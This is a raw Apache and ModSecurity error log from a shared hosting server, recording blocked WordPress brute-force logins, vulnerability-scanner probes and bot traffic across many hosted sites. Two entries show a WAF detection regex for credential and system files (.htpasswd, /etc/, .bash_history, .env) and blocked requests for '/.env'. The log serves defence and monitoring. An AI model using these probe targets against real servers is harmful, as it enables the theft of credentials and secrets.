[Tue May 26 19:37:06.932395 2026] [security2:error] [pid 70836:tid 71008] [client 202.76.174.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpCu_FvbQ_BhqVMRVrRAAAAK8"]
[Tue May 26 19:37:06.938961 2026] [autoindex:error] [pid 70836:tid 71016] [client 185.169.4.152:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/test/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 19:37:07.464861 2026] [security2:error] [pid 70836:tid 70948] [remote 165.22.95.96:35096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpC-_FvbQ_BhqVMRVrWwAAzm8"]
[Tue May 26 19:37:07.586051 2026] [security2:error] [pid 70836:tid 71034] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpC-_FvbQ_BhqVMRVrVwAAAMk"]
[Tue May 26 19:37:07.904974 2026] [autoindex:error] [pid 70836:tid 71075] [client 66.132.172.97:0] AH01276: Cannot serve directory /home1/moesartc/public_html/drunktales.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:37:08.535549 2026] [security2:error] [pid 70836:tid 71090] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpDO_FvbQ_BhqVMRVrcwAAAQE"]
[Tue May 26 19:37:09.280239 2026] [security2:error] [pid 70836:tid 70974] [client 104.23.223.17:9737] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahWpDO_FvbQ_BhqVMRVrfgAAAI0"]
[Tue May 26 19:37:09.604600 2026] [security2:error] [pid 70836:tid 70998] [client 119.23.78.59:53230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 59.78.23.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWpDe_FvbQ_BhqVMRVrmQAAAKU"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 19:37:10.187087 2026] [security2:error] [pid 70836:tid 70845] [remote 216.73.216.30:40848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWpDu_FvbQ_BhqVMRVrsAAAzAg"]
[Tue May 26 19:37:10.329256 2026] [security2:error] [pid 70836:tid 71024] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpDe_FvbQ_BhqVMRVrqwAAAL8"]
[Tue May 26 19:37:12.171496 2026] [security2:error] [pid 70836:tid 71022] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpD-_FvbQ_BhqVMRVr5QAAAL0"]
[Tue May 26 19:37:14.702073 2026] [security2:error] [pid 70836:tid 71034] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpEu_FvbQ_BhqVMRVsRAAAAMk"]
[Tue May 26 19:37:15.011863 2026] [security2:error] [pid 70836:tid 70860] [remote 216.73.216.30:40848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWpE-_FvbQ_BhqVMRVsWQAAihc"]
[Tue May 26 19:37:17.302950 2026] [security2:error] [pid 70836:tid 71016] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpFO_FvbQ_BhqVMRVsmAAAALc"]
[Tue May 26 19:37:19.549095 2026] [security2:error] [pid 70836:tid 71019] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpF-_FvbQ_BhqVMRVs7wAAALo"]
[Tue May 26 19:37:20.166254 2026] [security2:error] [pid 70836:tid 70975] [client 109.248.15.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpGO_FvbQ_BhqVMRVtDgAAAI4"], referer: https://www.anujtradingco.com/
[Tue May 26 19:37:20.281565 2026] [security2:error] [pid 70836:tid 70878] [remote 216.73.216.30:17652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWpGO_FvbQ_BhqVMRVtEwAAyyk"]
[Tue May 26 19:37:21.942838 2026] [security2:error] [pid 70836:tid 70977] [client 109.248.15.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpGe_FvbQ_BhqVMRVtSwAAAJA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1227424&moderation-hash=079be9c54ea2b0499db58515fd94cc70
[Tue May 26 19:37:22.062195 2026] [security2:error] [pid 70836:tid 71025] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpGe_FvbQ_BhqVMRVtQQAAAMA"]
[Tue May 26 19:37:23.009057 2026] [security2:error] [pid 70836:tid 71046] [client 176.65.139.231:38434] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "proxuber.glorodavionics.com"] [uri "/.env"] [unique_id "ahWpG-_FvbQ_BhqVMRVtZAAAANU"]
[Tue May 26 19:37:23.672642 2026] [security2:error] [pid 70836:tid 70978] [client 176.126.104.29:0] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "canopykaapi.com"] [uri "/wp-content/cache/speedycache/canopykaapi.com/all/index.html"] [unique_id "ahWpG-_FvbQ_BhqVMRVtfgAAAJE"]
[Tue May 26 19:37:23.673019 2026] [security2:error] [pid 70836:tid 70984] [client 176.126.104.29:9943] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "canopykaapi.com"] [uri "/"] [unique_id "ahWpG-_FvbQ_BhqVMRVtegAAAJc"]
[Tue May 26 19:37:24.355478 2026] [security2:error] [pid 70836:tid 71093] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpG-_FvbQ_BhqVMRVthwAAAQQ"]
[Tue May 26 19:37:25.034535 2026] [security2:error] [pid 70836:tid 70960] [remote 216.73.216.30:17652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWpHe_FvbQ_BhqVMRVtpQAAlHs"]
[Tue May 26 19:37:26.750251 2026] [security2:error] [pid 70836:tid 70974] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpHu_FvbQ_BhqVMRVtwwAAAI0"]
[Tue May 26 19:37:27.029497 2026] [security2:error] [pid 70836:tid 70983] [client 20.65.193.113:54882] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "162.215.241.212"] [uri "/index.php"] [unique_id "ahWpHu_FvbQ_BhqVMRVt3wAAAJY"]
[Tue May 26 19:37:27.170004 2026] [security2:error] [pid 70836:tid 71086] [client 172.225.180.170:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWpHu_FvbQ_BhqVMRVt3gAAAP0"]
[Tue May 26 19:37:28.506826 2026] [security2:error] [pid 70836:tid 71058] [client 185.251.19.111:39879] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.19.251.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWpIO_FvbQ_BhqVMRVt-QAAAOE"]
[Tue May 26 19:37:29.021397 2026] [security2:error] [pid 70836:tid 71061] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpIO_FvbQ_BhqVMRVuCQAAAOQ"]
[Tue May 26 19:37:29.626908 2026] [security2:error] [pid 70836:tid 71025] [client 109.248.15.13:59749] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWpIe_FvbQ_BhqVMRVuFwAAAMA"], referer: https://anujtradingco.com
[Tue May 26 19:37:30.661840 2026] [security2:error] [pid 70836:tid 70887] [remote 216.73.216.30:47822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWpIu_FvbQ_BhqVMRVuSAAAkjI"]
[Tue May 26 19:37:30.848855 2026] [security2:error] [pid 70836:tid 71073] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpIu_FvbQ_BhqVMRVuPgAAAPA"]
[Tue May 26 19:37:31.088110 2026] [security2:error] [pid 70836:tid 71048] [client 176.65.139.235:62086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "karuppuswamykovil.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWpI-_FvbQ_BhqVMRVuUAAAANc"]
[Tue May 26 19:37:31.187748 2026] [proxy:warn] [pid 70836:tid 71036] [client 43.134.53.242:49480] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 19:37:32.539606 2026] [security2:error] [pid 70836:tid 71009] [client 94.31.119.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpJO_FvbQ_BhqVMRVucgAAALA"]
[Tue May 26 19:37:32.852352 2026] [security2:error] [pid 70836:tid 71089] [client 43.134.53.242:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahWpI-_FvbQ_BhqVMRVuXAAAAQA"]
[Tue May 26 19:37:32.853108 2026] [security2:error] [pid 70836:tid 71036] [client 43.134.53.242:49480] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/400.shtml"] [unique_id "ahWpI-_FvbQ_BhqVMRVuWgAAAMs"]
[Tue May 26 19:37:33.651301 2026] [security2:error] [pid 70836:tid 71071] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpJe_FvbQ_BhqVMRVukQAAAO4"]
[Tue May 26 19:37:34.082884 2026] [security2:error] [pid 70836:tid 70974] [client 46.8.22.136:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpJu_FvbQ_BhqVMRVurQAAAI0"], referer: https://www.anujtradingco.com/
[Tue May 26 19:37:35.501799 2026] [security2:error] [pid 70836:tid 70905] [remote 216.73.216.30:47822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWpJ-_FvbQ_BhqVMRVuzwAApEQ"]
[Tue May 26 19:37:36.026857 2026] [security2:error] [pid 70836:tid 71071] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpJ-_FvbQ_BhqVMRVu0gAAAO4"]
[Tue May 26 19:37:36.046322 2026] [security2:error] [pid 70836:tid 71052] [client 46.8.22.136:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWpJ-_FvbQ_BhqVMRVu5AAAANs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1234972&moderation-hash=ec0dd9eb6987c90054e0ed82ca2c091f
[Tue May 26 19:37:36.234661 2026] [security2:error] [pid 70836:tid 70928] [remote 188.245.120.91:41716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 91.120.245.188.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpKO_FvbQ_BhqVMRVu5gAAvFs"]
[Tue May 26 19:37:37.017372 2026] [security2:error] [pid 70836:tid 71063] [client 152.42.186.39:61633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 39.186.42.152.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "keydussecurity.com"] [uri "/wp-login.php"] [unique_id "ahWpKO_FvbQ_BhqVMRVu-wAAAOY"], referer: https://t.co/
[Tue May 26 19:37:37.220147 2026] [security2:error] [pid 70836:tid 70932] [remote 188.245.120.91:41716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 91.120.245.188.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpKe_FvbQ_BhqVMRVvBQAA9F8"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:37:37.882180 2026] [security2:error] [pid 70836:tid 70934] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/inputs.php"] [unique_id "ahWpKe_FvbQ_BhqVMRVvEwAAy2E"]
[Tue May 26 19:37:37.997925 2026] [security2:error] [pid 70836:tid 70939] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/inputs.php"] [unique_id "ahWpKe_FvbQ_BhqVMRVvFwABA2Y"]
[Tue May 26 19:37:38.001596 2026] [security2:error] [pid 70836:tid 70941] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/inputs.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvGQAAzWg"]
[Tue May 26 19:37:38.106339 2026] [security2:error] [pid 70836:tid 70942] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/admin.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvGwAAqGk"]
[Tue May 26 19:37:38.228946 2026] [security2:error] [pid 70836:tid 70912] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/admin.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvHwAAvks"]
[Tue May 26 19:37:38.237231 2026] [security2:error] [pid 70836:tid 70943] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/goods.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvIQAA_2o"]
[Tue May 26 19:37:38.243301 2026] [security2:error] [pid 70836:tid 70913] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/admin.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvIwAA70w"]
[Tue May 26 19:37:38.318981 2026] [security2:error] [pid 70836:tid 70914] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/file.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvKAAA2k0"]
[Tue May 26 19:37:38.319384 2026] [security2:error] [pid 70836:tid 70914] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/goods.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvKQABAU0"]
[Tue May 26 19:37:38.401997 2026] [security2:error] [pid 70836:tid 70917] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/goods.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvKwAA4lA"]
[Tue May 26 19:37:38.432055 2026] [security2:error] [pid 70836:tid 70918] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/file.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvLAAA61E"]
[Tue May 26 19:37:38.437460 2026] [security2:error] [pid 70836:tid 70919] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/adminfuns.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvLQAA-1I"]
[Tue May 26 19:37:38.477897 2026] [security2:error] [pid 70836:tid 70920] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/file.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvMQAA5FM"]
[Tue May 26 19:37:38.515684 2026] [security2:error] [pid 70836:tid 70921] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/adminfuns.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvNQAAw1Q"]
[Tue May 26 19:37:38.556157 2026] [security2:error] [pid 70836:tid 70923] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/adminfuns.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvOwAA5lY"]
[Tue May 26 19:37:38.561599 2026] [security2:error] [pid 70836:tid 70924] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/404.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvPQAAsFc"]
[Tue May 26 19:37:38.579008 2026] [security2:error] [pid 70836:tid 70916] [remote 209.42.19.17:41366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpKu_FvbQ_BhqVMRVvKgAA7U8"]
